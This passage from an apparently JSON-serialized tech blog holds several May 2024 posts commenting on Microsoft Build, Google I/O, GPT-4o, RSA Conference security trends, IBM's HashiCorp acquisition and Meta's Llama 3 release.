app,\u0026rdquo; he\u0026rsquo;s not just speaking in marketing terms — he\u0026rsquo;s describing a technical architecture where AI inference is a first-class platform capability at every layer of the stack.\nMy Take # I\u0026rsquo;ve been through enough technology cycles to know that not every bold vision pans out. 
But Microsoft\u0026rsquo;s position here is strong: they have the cloud infrastructure (Azure), the developer tools (VS Code, GitHub), the enterprise distribution (Microsoft 365), and now the hardware partnerships for on-device AI. That\u0026rsquo;s a more complete stack than anyone else can offer right now.\nMy concern is the pace. Shipping features like Recall before the security implications are fully vetted feels rushed. The competitive pressure from Google and Apple is clearly driving timelines, but in enterprise software, trust is earned slowly and lost quickly.\nFor developers, though, the practical takeaway is clear: invest time in understanding the AI toolchain Microsoft is building. Whether it\u0026rsquo;s Azure AI Studio, Copilot extensions, or building for NPU-enabled devices, these capabilities are going to be expected by users and employers alike within the next year or two. The Copilot era isn\u0026rsquo;t coming — it\u0026rsquo;s here.\n","date":"30 May 2024","externalUrl":null,"permalink":"/posts/240530-microsoft-build-2024-copilot-era/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2024 doubles down on AI with Copilot+ PCs, Windows Recall, and deep Azure AI integrations — but is the industry ready for always-on AI?","title":"Microsoft Build 2024 — The Copilot Era Gets Real","type":"posts"},{"content":"Microsoft Build 2024 wrapped up yesterday, and after digesting two days of announcements, the picture is clear: Microsoft is building an entire development platform around the concept of \u0026ldquo;copilots.\u0026rdquo; Not just GitHub Copilot for code, but a full stack for creating, deploying, and managing AI assistants across every layer of the enterprise. 
Whether you find this exciting or exhausting probably depends on how deeply invested you are in the Microsoft ecosystem.\nThe Copilot Stack, Explained # Satya Nadella\u0026rsquo;s keynote laid out what Microsoft is calling the Copilot stack — a layered architecture for building AI-powered applications. At the bottom, you have the infrastructure: Azure AI with access to OpenAI models, Phi-3 small language models, and third-party models through the model catalog. In the middle, there\u0026rsquo;s the orchestration layer: Copilot Studio for building custom copilots, Semantic Kernel for developer-level control, and AI Search for grounding. At the top, there are the copilot experiences integrated into Microsoft 365, Dynamics, and other first-party products.\nThe most significant announcement for developers is the expansion of Copilot Studio, which now lets you build custom copilots that can reason over your organization\u0026rsquo;s data, take actions through connectors, and be deployed across Microsoft Teams, web, and mobile. Think of it as a low-code platform for building domain-specific AI assistants — your HR copilot, your IT support copilot, your sales copilot.\nFor those of us who\u0026rsquo;ve been building chatbots and virtual assistants the hard way — stitching together LLM calls, retrieval pipelines, and action frameworks with custom code — Copilot Studio represents a significant reduction in development effort. The tradeoff, as always with low-code platforms, is flexibility. If your use case fits the patterns Microsoft has designed for, it\u0026rsquo;s remarkably productive. If it doesn\u0026rsquo;t, you\u0026rsquo;ll hit walls.\nTeam Copilot — From Assistant to Participant # One of the more interesting announcements is Team Copilot, which evolves the Copilot concept from a personal assistant to a team member. In meetings, Team Copilot can manage the agenda, take notes, and track action items. In group chats, it can be assigned tasks and report back. 
In project management contexts (through Planner integration), it can create and assign tasks based on project plans.\nThis is a subtle but important shift. Previous AI assistant paradigms have been one-to-one: you ask, it answers. Team Copilot operates as a participant in collaborative workflows, which introduces interesting questions about accountability, trust, and workflow design. When an AI agent is creating tasks and assigning them to humans, you need clear governance around what it can and can\u0026rsquo;t do autonomously.\nI\u0026rsquo;ve seen enough enterprise technology deployments to know that the success of Team Copilot will depend entirely on how well organizations handle change management. The technology is capable; the organizational readiness is the bottleneck.\nGitHub Copilot Workspace # For developers specifically, GitHub Copilot Workspace is the announcement that resonated most with me. It\u0026rsquo;s a new development environment concept where you start with a GitHub Issue, and Copilot Workspace generates a plan, proposes code changes across multiple files, and lets you iterate on the implementation before creating a pull request.\nThis is different from the inline code completion we\u0026rsquo;ve been using in Copilot for the past two years. It\u0026rsquo;s operating at the task level rather than the line level — understanding the broader context of what you\u0026rsquo;re trying to accomplish and generating coherent multi-file changes. In the demos, it looked genuinely useful for well-defined tasks like bug fixes, feature additions from clear specs, and dependency updates.\nThe pragmatist in me notes that \u0026ldquo;well-defined tasks\u0026rdquo; is doing a lot of heavy lifting in that description. 
The hardest parts of software development — understanding ambiguous requirements, making architectural tradeoffs, navigating legacy codebases with undocumented assumptions — are precisely the areas where current AI capabilities fall short. Copilot Workspace will be fantastic for the 30% of development work that\u0026rsquo;s well-structured. The other 70% still needs experienced engineers.\nPhi-3 and the Small Language Model Strategy # Microsoft\u0026rsquo;s continued investment in the Phi-3 family of small language models is strategically interesting. Phi-3-mini, with 3.8 billion parameters, achieves performance competitive with much larger models on many benchmarks. Phi-3-small (7B) and Phi-3-medium (14B) extend this further.\nFor developers building applications where latency, cost, or data privacy requirements make large cloud-hosted models impractical, small language models are increasingly viable. Running a Phi-3-mini on-device or in a private cloud instance gives you capable AI without the data governance headaches of sending everything to a third-party API.\nI\u0026rsquo;ve been experimenting with small models for specific tasks — code review, log analysis, document classification — and the results are often surprisingly good when the task is well-scoped. The key insight is that you don\u0026rsquo;t need GPT-4-class intelligence for every AI feature. Matching model capability to task complexity is becoming an important architectural skill.\nMy Take # Build 2024 shows Microsoft executing on a clear strategy: make AI development accessible at every level, from low-code Copilot Studio to pro-code Semantic Kernel, and embed AI capabilities into every product surface. It\u0026rsquo;s comprehensive, well-funded, and leveraging Microsoft\u0026rsquo;s unmatched distribution through enterprise channels.\nMy concern is complexity. 
The Microsoft AI development landscape now includes Azure OpenAI Service, Azure AI Studio, Copilot Studio, Semantic Kernel, AI Search, Phi-3 models, and half a dozen other components. For enterprise developers already navigating the Microsoft ecosystem, adding AI capabilities is relatively straightforward. For everyone else, the onboarding curve is steep.\nThe practical advice: if you\u0026rsquo;re a Microsoft shop, lean into Copilot Studio and explore GitHub Copilot Workspace. The productivity gains are real. If you\u0026rsquo;re not, take note of the small language model trend — Phi-3 and models like it are making local AI deployment increasingly practical, regardless of your cloud provider.\nThree major developer conferences in three weeks — OpenAI, Google I/O, and now Build. The AI platform war is fully engaged, and developers have never had more options. The challenge now is choosing wisely and building architectures that can adapt as this landscape continues to shift.\n","date":"23 May 2024","externalUrl":null,"permalink":"/posts/240523-microsoft-build-2024-copilot-stack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Microsoft Build 2024 reveals the full Copilot stack strategy. From custom copilots to Team Copilot, here’s what developers need to know about building on Microsoft’s AI platform.","title":"Microsoft Build 2024 — The Copilot Stack and the Future of Developer Tooling","type":"posts"},{"content":"Google I/O 2024 happened on Tuesday, and if you watched the keynote, you could be forgiven for thinking Google had renamed itself to Gemini. The word was mentioned over 120 times during the two-hour presentation. 
But once you filter out the marketing repetition, there are genuine developer-facing changes worth unpacking — particularly around Gemini 1.5 Pro, the new Gemini 1.5 Flash model, and Google\u0026rsquo;s aggressive push to make its AI infrastructure the default development platform.\nGemini 1.5 Pro Gets a Million-Token Context Window for Everyone # The headline capability that matters most for developers is the expansion of Gemini 1.5 Pro\u0026rsquo;s context window to 1 million tokens in the generally available release, with a 2-million-token window available in preview. To put this in perspective, that\u0026rsquo;s roughly 1,500 pages of text, or an hour of video, or 11 hours of audio — all processable in a single API call.\nI\u0026rsquo;ve been working with various LLMs\u0026rsquo; context windows for months now, and the practical difference between 128K tokens (GPT-4 Turbo\u0026rsquo;s limit) and 1M tokens isn\u0026rsquo;t just quantitative — it\u0026rsquo;s qualitative. The evolution from early GPT-3 experiments through GPT-4\u0026rsquo;s capabilities has been dramatic, but this context window expansion is equally transformative. At 1M tokens, you can feed an entire codebase into the context. You can process complete documentation sets. You can analyze full-length videos without chunking. The kinds of applications this enables are fundamentally different from what\u0026rsquo;s possible with shorter contexts.\nIn my testing with the preview API, the retrieval quality across that full context window is impressive. Google\u0026rsquo;s \u0026ldquo;needle in a haystack\u0026rdquo; benchmarks show near-perfect recall even at the million-token scale, which aligns with what I\u0026rsquo;ve observed in practice. 
The model genuinely uses the full context rather than degrading at the edges.\nGemini 1.5 Flash — The Price-Performance Play # Perhaps more interesting for production applications is Gemini 1.5 Flash, a new lightweight model designed for high-volume, latency-sensitive tasks. Flash is significantly faster and cheaper than Pro while maintaining surprisingly strong performance on most benchmarks.\nThis slots into a pattern we\u0026rsquo;re seeing across all major AI providers: the emergence of a model tier specifically designed for the \u0026ldquo;good enough, but fast and cheap\u0026rdquo; use case. OpenAI has GPT-4o, Anthropic has Claude 3 Haiku, and now Google has Flash. For developers building AI features into products, having this range of price-performance options is incredibly valuable. This follows the pattern established by earlier AI model tiers where multiple capability levels serve different needs.\nFlash supports the same million-token context window as Pro, which is a differentiator. If you need to process large documents quickly and cheaply — think summarization pipelines, classification at scale, or extraction from lengthy records — Flash with a huge context window is a compelling option.\nProject Astra and the Agent Future # Google showed Project Astra, a research prototype of a \u0026ldquo;universal AI agent\u0026rdquo; that can see through your phone camera, understand what it\u0026rsquo;s looking at, remember context from earlier in the conversation, and provide helpful responses in real time. The demo was impressive — the agent identified code on a screen, explained what a piece of hardware was, and remembered where the user had left their glasses.\nWhile Astra is a research preview, it signals where Google (and frankly, all major AI companies) are heading: persistent, multimodal AI agents that maintain context over extended interactions. The autonomous agent space was already getting heated, and Astra represents the frontier of this evolution. 
For developers, the implication is that we need to start thinking about how our applications and APIs will interact with these kinds of agents. If an AI agent can see a user\u0026rsquo;s screen and interact with web applications on their behalf, our UIs and APIs need to be agent-friendly — not just human-friendly.\nGoogle\u0026rsquo;s Developer Platform Consolidation # Beyond the AI headlines, Google is making notable infrastructure moves. Firebase is getting deeper Gemini integration, with AI-powered features for app development including automated crash analysis and performance recommendations. Vertex AI is positioning itself as the enterprise ML platform with new features for grounding model outputs in Google Search data and enterprise knowledge bases.\nThe strategic picture is clear: Google wants to be the default platform for AI-powered application development, from prototyping (AI Studio) through production (Vertex AI) with supporting infrastructure (Firebase, Cloud Run, GKE). It\u0026rsquo;s a full-stack play that mirrors what Microsoft is doing with Azure OpenAI Service and what AWS is doing with Bedrock.\nFor developers choosing a cloud platform, this consolidation creates both opportunity and lock-in risk. The integrated tooling is genuinely convenient — being able to go from AI Studio prototype to Vertex AI production deployment without changing your code is appealing. But the more deeply you integrate with platform-specific features, the harder it becomes to migrate if pricing or capabilities shift.\nMy Take # Google I/O 2024 showed a company that has fully committed to AI as its platform strategy. The Gemini models are competitive — the 1M token context window is a genuine differentiator, and Flash fills an important gap in the model lineup.\nBut I\u0026rsquo;d urge developers to look past the keynote spectacle and focus on the practical bits: the API improvements, the pricing, the context window capabilities. 
These are the things that actually affect your architecture decisions and your users\u0026rsquo; experience.\nThe million-token context window in particular is something I\u0026rsquo;d encourage every developer to experiment with. It unlocks use cases that simply weren\u0026rsquo;t possible before, and it changes how you think about document processing, code analysis, and knowledge retrieval. Even if you\u0026rsquo;re not building on Google\u0026rsquo;s platform, understanding what\u0026rsquo;s possible with this scale of context will inform your technical decisions regardless of which provider you ultimately choose.\nThe AI platform war is heating up, and developers are the beneficiaries. Competition is driving down prices, expanding capabilities, and creating more options than we\u0026rsquo;ve ever had. The challenge is no longer access to powerful AI — it\u0026rsquo;s figuring out what to build with it.\n","date":"16 May 2024","externalUrl":null,"permalink":"/posts/240516-google-io-2024-gemini-developer-tools/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Google I/O 2024 was wall-to-wall Gemini. Beyond the AI hype, there are meaningful developer platform shifts worth paying attention to.","title":"Google I/O 2024 — Gemini Everywhere and the Developer Platform Play","type":"posts"},{"content":"OpenAI just held their Spring Update event and the headline is GPT-4o (the \u0026ldquo;o\u0026rdquo; stands for \u0026ldquo;omni\u0026rdquo;). It\u0026rsquo;s a new model that natively processes text, audio, and vision inputs and produces text, audio, and image outputs — all within a single neural network. If you\u0026rsquo;ve been building with the OpenAI API, this changes the game in several concrete ways. 
The GPT-4 Turbo announcements at DevDay had laid the groundwork for platform expansion, and GPT-4o represents the next evolution.\nWhat Makes GPT-4o Different # Previous iterations of OpenAI\u0026rsquo;s multimodal capabilities were essentially pipelines: audio went through Whisper for transcription, text went through GPT-4, and text-to-speech generated the audio response. GPT-4o collapses this into a single end-to-end model. The practical difference is substantial.\nResponse latency for audio drops from several seconds to as low as 232 milliseconds — essentially human conversational speed. The model can detect emotion in voice, modulate its own speaking style, and handle interruptions naturally. During the demo, the model sang, changed pacing on request, and reacted to visual input from a phone camera in real time.\nBut let\u0026rsquo;s set aside the impressive demo moments and focus on what matters for those of us building software. The key changes are:\nAPI-level: GPT-4o matches GPT-4 Turbo performance on text while being 2x faster and 50% cheaper. That alone is a significant practical improvement. The vision capabilities are substantially better, particularly for non-English text recognition. And the new audio capabilities will be available through a new API interface in the coming weeks.\nFree tier access: GPT-4o is rolling out to all ChatGPT users, including free tier. This is a strategic move that dramatically expands the user base for GPT-4-class capabilities. For developers building products, this means your users\u0026rsquo; expectations of what AI can do just jumped significantly. This democratization of capabilities echoes the impact the ChatGPT API release had on the developer community months earlier.\nRate limits and pricing: At half the cost of GPT-4 Turbo with better performance, the economics of building GPT-4-class features into applications just got much more favorable. 
For teams that had been using GPT-3.5 Turbo for cost reasons but wanting GPT-4 quality, GPT-4o might be the sweet spot.\nThe Multimodal API Opportunity # The real developer story here isn\u0026rsquo;t just \u0026ldquo;faster and cheaper GPT-4.\u0026rdquo; It\u0026rsquo;s the convergence of modalities in a single API call. Consider what becomes possible:\nAn application can now send a screenshot of a UI and ask the model to identify accessibility issues, generate test scripts, or suggest design improvements — with better vision understanding and at lower cost. A customer support system can process voice calls directly, understanding both the content and emotional tone, without a separate transcription step. A document processing pipeline can handle mixed-media documents (text, images, charts, handwriting) in a single pass.\nI\u0026rsquo;ve been prototyping with the GPT-4 Vision API since it launched, and the improvement in visual understanding is immediately noticeable. Charts and diagrams that GPT-4V would sometimes misinterpret are handled correctly by GPT-4o. Code in screenshots is transcribed more accurately. And the speed improvement makes interactive use cases — where a user is pointing a camera at something and expecting real-time feedback — actually viable.\nThe Competitive Landscape Shifts # GPT-4o doesn\u0026rsquo;t exist in a vacuum. Google\u0026rsquo;s Gemini models have been multimodal from the start, and Anthropic\u0026rsquo;s Claude 3 family launched with strong vision capabilities just two months ago. What OpenAI has done is combine state-of-the-art quality across all modalities with aggressive pricing that puts pressure on everyone. The foundation laid by GPT-4\u0026rsquo;s initial release continues to shape the trajectory of the entire industry.\nThe pricing war is worth watching. When GPT-4 launched a year ago, the cost per token was a genuine barrier for many applications. 
Now GPT-4o offers equivalent quality at prices that are approaching where GPT-3.5 Turbo was. This compression of the cost curve is accelerating adoption in ways that raw capability improvements alone wouldn\u0026rsquo;t achieve.\nFor developers building on these APIs, the multi-provider strategy is becoming increasingly important. The performance gap between top models from OpenAI, Anthropic, and Google is narrowing, while pricing and availability fluctuate. Abstracting your LLM calls behind a common interface — whether that\u0026rsquo;s LangChain, LiteLLM, or a homegrown abstraction — is practical engineering hygiene at this point.\nImplications for Voice-First Applications # The audio capabilities of GPT-4o deserve special attention. Real-time voice interaction with sub-250ms latency and emotional awareness is a threshold moment for voice-first applications. Previous voice assistants (including those built on OpenAI\u0026rsquo;s APIs) had a noticeable lag that made conversations feel stilted. GPT-4o eliminates that.\nI expect we\u0026rsquo;ll see a wave of voice-first applications in domains where hands-free interaction is valuable: field service, healthcare documentation, accessibility tools, and developer workflows (imagine pair programming with a voice-interactive AI that can see your screen). The technology is now fast enough and natural enough that the limiting factor shifts from \u0026ldquo;can we do this?\u0026rdquo; to \u0026ldquo;should we, and how do we design the UX?\u0026rdquo;\nMy Take # GPT-4o is less of a revolutionary breakthrough and more of an engineering tour de force — taking capabilities that existed in separate systems and unifying them into a single, faster, cheaper model. But in practical terms, that unification is what enables new categories of applications.\nMy advice for developers: update your cost models. 
If you\u0026rsquo;ve been holding back on GPT-4-class features because of API costs, revisit those calculations with GPT-4o pricing. Start experimenting with the multimodal capabilities, especially vision — the quality improvement is worth exploring even if you don\u0026rsquo;t have an immediate use case. And when the audio API launches, prototype quickly. The first wave of genuinely conversational AI applications is about to arrive, and being early matters.\nWe\u0026rsquo;re in a period where the major AI labs are competing on price, speed, and multimodal breadth simultaneously. As developers, this is an excellent position to be in. The tools are getting better and cheaper at a pace that\u0026rsquo;s hard to keep up with — but trying to keep up is absolutely worth the effort. The trajectory from the ChatGPT API\u0026rsquo;s early enablement through GPT-4\u0026rsquo;s refinement to GPT-4o\u0026rsquo;s multimodal maturity shows an acceleration that\u0026rsquo;s reshaping what\u0026rsquo;s possible for AI-powered applications.\n","date":"9 May 2024","externalUrl":null,"permalink":"/posts/240509-openai-gpt4o-multimodal/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI’s Spring Update reveals GPT-4o, a natively multimodal model that processes text, audio, and vision in a single architecture. The developer implications are significant.","title":"GPT-4o — OpenAI's Multimodal Leap and What It Means for Developers","type":"posts"},{"content":"RSA Conference 2024 is underway in San Francisco this week, and if you thought last year\u0026rsquo;s event was AI-heavy, this year makes that look restrained. Walking through the expo floor (virtually — I\u0026rsquo;m following along from the Netherlands), it seems like every vendor has bolted \u0026ldquo;AI-powered\u0026rdquo; onto their product descriptions. 
But beneath the marketing noise, there are genuine shifts happening in how we think about security in an AI-saturated world.\nThe Two Sides of AI in Security # The conversation at RSAC this year breaks neatly into two tracks: using AI to defend, and defending against AI. Both are maturing rapidly, but at very different rates.\nOn the defensive side, AI-powered threat detection has moved well past the \u0026ldquo;anomaly detection\u0026rdquo; buzzword phase. Companies like CrowdStrike and Palo Alto Networks are demonstrating systems that can correlate signals across endpoints, network traffic, and cloud workloads in ways that would take human analysts hours or days. The CrowdStrike Charlotte AI assistant, for instance, lets security analysts query their threat data in natural language — think \u0026ldquo;show me all lateral movement attempts in the last 48 hours involving service accounts\u0026rdquo; — and get actionable results.\nHaving spent years dealing with SIEM alert fatigue, I can tell you this kind of capability is genuinely transformative. The bottleneck in security operations has never been data collection; it\u0026rsquo;s been making sense of the data fast enough to act on it. Large language models are remarkably good at this translation layer between raw telemetry and human decision-making.\nOn the offensive side, the picture is more sobering. AI-generated phishing emails are already measurably more effective than traditional ones. Deepfake audio is being used in business email compromise attacks — or rather, business voice compromise attacks. And the barrier to entry for creating sophisticated attack tools continues to drop. 
A talk at this year\u0026rsquo;s conference demonstrated how an attacker with moderate skills could use publicly available LLMs to generate polymorphic malware that evades traditional signature-based detection.\nThe Software Supply Chain Keeps Everyone Up at Night # If there\u0026rsquo;s one topic that rivals AI for floor time at RSAC 2024, it\u0026rsquo;s software supply chain security. The echoes of SolarWinds, Log4j, and the recent xz Utils backdoor discovery are still reverberating through the industry.\nThe xz Utils incident, which came to light just a few weeks ago, is particularly chilling because it wasn\u0026rsquo;t a vulnerability in the traditional sense — it was a deliberate, patient, multi-year social engineering campaign to compromise a critical open-source library maintainer and insert a backdoor. It\u0026rsquo;s the kind of attack that makes you question every dependency in your stack.\nSeveral RSAC sessions are focused on practical responses: improving SBOM (Software Bill of Materials) tooling, implementing more rigorous code signing practices, and establishing better processes for vetting open-source contributors. CISA\u0026rsquo;s continued push for Secure by Design principles is getting strong representation, and there\u0026rsquo;s growing momentum around making software manufacturers accountable for the security of their products.\nZero Trust Is Finally Just \u0026ldquo;Security\u0026rdquo; # I\u0026rsquo;ve been following the zero trust conversation for the better part of a decade, and this might be the first year at RSAC where it doesn\u0026rsquo;t feel like a marketing category anymore. It\u0026rsquo;s just\u0026hellip; how you do security now. The perimeter is dead. Identity is the new perimeter. Every request is verified. These aren\u0026rsquo;t revolutionary statements anymore; they\u0026rsquo;re baseline assumptions.\nWhat\u0026rsquo;s more interesting is the implementation maturity. 
Companies are moving beyond \u0026ldquo;we deployed a zero trust network access (ZTNA) product\u0026rdquo; to genuinely rethinking their security architectures around continuous verification. The integration between identity providers, device trust signals, and application-level authorization is getting more seamless, and frameworks like NIST SP 800-207 are being adopted as practical blueprints rather than aspirational documents.\nThe Talent Gap Hasn\u0026rsquo;t Closed # Despite all the AI automation talk, the cybersecurity talent shortage remains acute. ISC2\u0026rsquo;s latest estimates put the global shortage at around 4 million professionals. The irony isn\u0026rsquo;t lost on anyone: we\u0026rsquo;re building AI tools to augment security teams partly because we can\u0026rsquo;t hire enough humans to do the work.\nSeveral RSAC sessions address this through the lens of upskilling — using AI not just as a force multiplier for existing analysts, but as a training tool for junior staff. The idea of an AI copilot that explains its reasoning, teaches analysts about attack patterns, and helps them develop intuition faster is compelling. Whether it works in practice remains to be seen, but the intent is sound.\nMy Take # RSAC is always a mix of genuine insight and vendor theater, and 2024 is no exception. But if I had to distill the meaningful signal from this year\u0026rsquo;s conference, it would be this: the security industry is finally grappling with AI as a dual-use technology in a serious way.\nThe organizations that will fare best are the ones that invest in AI-powered defenses while simultaneously hardening their systems against AI-powered attacks. 
That means red-teaming your defenses against AI-generated threats, treating your software supply chain as a first-class security domain, and accepting that the threat landscape is evolving faster than any single product can address.\nFor practitioners, my takeaway is practical: if you haven\u0026rsquo;t looked at your supply chain security posture since the xz Utils incident, now is the time. Update your threat models to include AI-generated social engineering. And if your organization is still treating zero trust as a future initiative rather than a current priority, you\u0026rsquo;re behind.\nThe adversaries are already using AI. The question isn\u0026rsquo;t whether we should too — it\u0026rsquo;s whether we can do it thoughtfully enough to stay ahead.\n","date":"2 May 2024","externalUrl":null,"permalink":"/posts/240502-rsa-conference-2024-ai-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"RSA Conference 2024 kicks off in San Francisco with AI dominating every conversation. But beneath the marketing buzz, there are real security challenges emerging that practitioners need to face.","title":"RSA Conference 2024 — AI Meets Cybersecurity, For Better and Worse","type":"posts"},{"content":"Yesterday, IBM announced it would acquire HashiCorp for approximately $6.4 billion in cash, at $35 per share. If you\u0026rsquo;ve been working in cloud infrastructure for the past decade, this news probably hit you somewhere between \u0026ldquo;inevitable\u0026rdquo; and \u0026ldquo;deeply concerning.\u0026rdquo; HashiCorp\u0026rsquo;s tools — Terraform, Vault, Consul, Nomad — are embedded in the infrastructure workflows of thousands of organizations. This acquisition reshapes the landscape in ways we need to think carefully about.\nThe Deal in Context # IBM has been on an acquisition spree that started accelerating after spinning off its managed infrastructure business as Kyndryl in 2021. 
The Red Hat acquisition in 2019 for $34 billion was the flagship move, and HashiCorp fits neatly into that hybrid cloud strategy. Arvind Krishna\u0026rsquo;s IBM is betting heavily on becoming the enterprise platform for multi-cloud management, and HashiCorp\u0026rsquo;s tools are the connective tissue that makes multi-cloud work.\nThe $6.4 billion price tag is notable — HashiCorp\u0026rsquo;s stock had been struggling since its IPO in late 2021, dropping from highs near $100 to the low $20s before the acquisition premium. For shareholders, this is a lifeline. For the community, it\u0026rsquo;s a question mark.\nThe Terraform Elephant in the Room # Let\u0026rsquo;s address what everyone\u0026rsquo;s thinking about: Terraform. It\u0026rsquo;s the de facto standard for infrastructure-as-code, used by teams ranging from two-person startups to Fortune 100 enterprises. But the relationship between HashiCorp and its open-source community has already been strained.\nLast August, HashiCorp switched Terraform\u0026rsquo;s license from the Mozilla Public License to the Business Source License (BSL), a move that triggered the creation of OpenTofu — a community fork under the Linux Foundation. That license change was widely seen as HashiCorp preparing for exactly this kind of exit: making the company more attractive to acquirers by protecting revenue streams from competing managed services.\nNow, with IBM at the helm, the question becomes: will IBM double down on the BSL approach, or will they find a way to mend fences with the community? IBM has historically been a strong contributor to open source — their stewardship of Red Hat and involvement in projects like Eclipse and the Linux kernel suggests they understand the value of community goodwill. But understanding it and acting on it are different things.\nWhat This Means for Your Stack # If you\u0026rsquo;re running Terraform in production (and statistically, many of you are), the immediate impact is minimal. 
IBM has said HashiCorp will operate as a division within IBM Software, and there\u0026rsquo;s no indication of sudden product changes. But I\u0026rsquo;d encourage teams to think about this on a longer timeline.\nIn my experience with large enterprise acquisitions, the first 12-18 months are usually stable. The acquiring company wants to retain customers and talent. It\u0026rsquo;s year two and beyond where you start seeing the integration tax — products get folded into enterprise bundles, pricing models shift, and the standalone product roadmap starts bending toward the parent company\u0026rsquo;s strategic priorities.\nFor Vault users, this could actually be positive. IBM has deep enterprise security relationships, and Vault\u0026rsquo;s secrets management capabilities could get significantly more investment. Consul and Nomad, however, are harder to predict. Consul overlaps somewhat with Red Hat\u0026rsquo;s service mesh story, and Nomad has always lived in Kubernetes\u0026rsquo; shadow.\nThe Broader Consolidation Pattern # This acquisition is part of a pattern that\u0026rsquo;s been accelerating in the infrastructure tooling space. Broadcom acquired VMware. Cisco bought Splunk. Now IBM gets HashiCorp. The independent infrastructure software company is becoming an endangered species.\nFor those of us who\u0026rsquo;ve been building on these tools for years, the pattern is familiar and frustrating. You invest in learning a tool, build your workflows around it, advocate for it within your organization — and then it gets absorbed into an enterprise conglomerate where your voice as a practitioner matters less than the enterprise sales motion.\nThe silver lining, if there is one, is that this consolidation is creating real demand for genuinely open alternatives. OpenTofu is gaining traction. Pulumi offers a different approach to IaC. Crossplane is building a Kubernetes-native infrastructure management layer. 
The ecosystem is more diverse than it was five years ago, even as the big players consolidate.\nMy Take # I\u0026rsquo;ve been using HashiCorp tools since the early Vagrant days, and I\u0026rsquo;ve watched the company evolve from a scrappy open-source shop to an enterprise-focused business. The IBM acquisition feels like the final chapter of that transformation.\nMy practical advice: don\u0026rsquo;t panic-migrate off Terraform tomorrow. But do invest time in understanding OpenTofu and other alternatives. Make sure your Terraform modules are written in a way that\u0026rsquo;s portable. And if you\u0026rsquo;re making new infrastructure decisions, weigh the long-term governance risk alongside the technical merits.\nThe infrastructure-as-code space is mature enough now that no single vendor should be a single point of failure in your strategy. IBM acquiring HashiCorp is a reminder that in enterprise software, the only constant is change — and the best defense is keeping your options open.\nThis is a developing story, and I\u0026rsquo;ll be watching closely as the deal moves through regulatory approval in the coming months.\n","date":"25 April 2024","externalUrl":null,"permalink":"/posts/240425-ibm-hashicorp-acquisition/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"IBM’s $6.4 billion acquisition of HashiCorp signals a major consolidation in the cloud infrastructure space. Here’s what it means for Terraform users and the broader IaC community.","title":"IBM Acquires HashiCorp — What It Means for the Infrastructure-as-Code Ecosystem","type":"posts"},{"content":"Meta just released Llama 3, and the benchmarks are turning heads. The new models — available in 8B and 70B parameter variants — are posting scores that put them at or near the top of their respective weight classes across virtually every standard evaluation. 
The 8B model outperforms the previous Llama 2 70B on several benchmarks, which is remarkable when you think about the efficiency gain that represents. And a 400B+ parameter model is reportedly still in training. If the scaling trend holds, that one could challenge GPT-4 class models.\nI\u0026rsquo;ve been following the open-weight AI model space closely since the original Llama leak in early 2023, and Llama 3 feels like a genuine inflection point. This isn\u0026rsquo;t incremental improvement — it\u0026rsquo;s a step change. The journey from GPT-3\u0026rsquo;s introduction through GPT-4\u0026rsquo;s capabilities has shown the industry what frontier models can do, and now Meta is bringing similar power to open weights.\nWhat\u0026rsquo;s Under the Hood # Meta\u0026rsquo;s announcement reveals some interesting architectural and training decisions. Llama 3 sticks with the decoder-only transformer architecture — no surprise there — but makes several important changes from Llama 2:\nTokenizer upgrade: A new 128K token vocabulary (up from 32K in Llama 2) using tiktoken. Larger vocabularies mean better text compression, which means the model can process more information within its context window. This alone is a meaningful improvement for multilingual and code-heavy use cases.\nGrouped Query Attention (GQA) is now used across all model sizes, not just the larger variants. This architectural choice improves inference efficiency — a practical consideration that matters enormously when you\u0026rsquo;re deploying these models at scale.\nTraining data: 15 trillion tokens — roughly 7x the Llama 2 training set. Meta reports extensive data filtering and quality curation pipelines, including using Llama 2 itself as a classifier for data quality. The training data cutoff matters here: this is current enough to include recent events and technical developments.\nContext length: 8,192 tokens as the base context window. 
Not the longest in the market (Claude offers 200K, GPT-4 Turbo offers 128K), but respectable and sufficient for many practical applications.\nThe 70B model\u0026rsquo;s benchmark results are particularly impressive. It\u0026rsquo;s competitive with Claude 3 Sonnet and approaches GPT-4\u0026rsquo;s performance on several tasks, while being freely downloadable and runnable on your own infrastructure. The 8B model, meanwhile, is small enough to run on a single consumer GPU with quantization — opening up local LLM deployment to a much wider audience.\nThe Open-Weight Advantage # I want to be precise about terminology here. Meta calls Llama 3 \u0026ldquo;open source,\u0026rdquo; but purists will (correctly) note that the license has restrictions. You can\u0026rsquo;t use Llama 3 or its outputs to improve other large language models, apart from Llama 3 derivatives. Companies whose products exceed 700 million monthly active users need a separate license from Meta. It\u0026rsquo;s \u0026ldquo;open weights\u0026rdquo; more than \u0026ldquo;open source\u0026rdquo; in the traditional sense.\nThat said, for the vast majority of developers and organizations, the practical benefit is enormous. You can download the model weights, run them locally, fine-tune them on your data, deploy them in your products, and inspect every layer of the network. Try doing that with GPT-4.\nThe implications for enterprise adoption are significant. I\u0026rsquo;ve worked with several organizations that are interested in LLM capabilities but have legitimate concerns about sending proprietary data to third-party APIs. Data residency requirements, industry regulations, competitive sensitivity — there are many valid reasons to want your AI model running on your own infrastructure. Llama 3 makes that feasible at a quality level that was previously only available through API calls to OpenAI or Anthropic.\nThe Ecosystem Effect # What excites me most about Llama 3 isn\u0026rsquo;t the model itself — it\u0026rsquo;s what the ecosystem will build on top of it. 
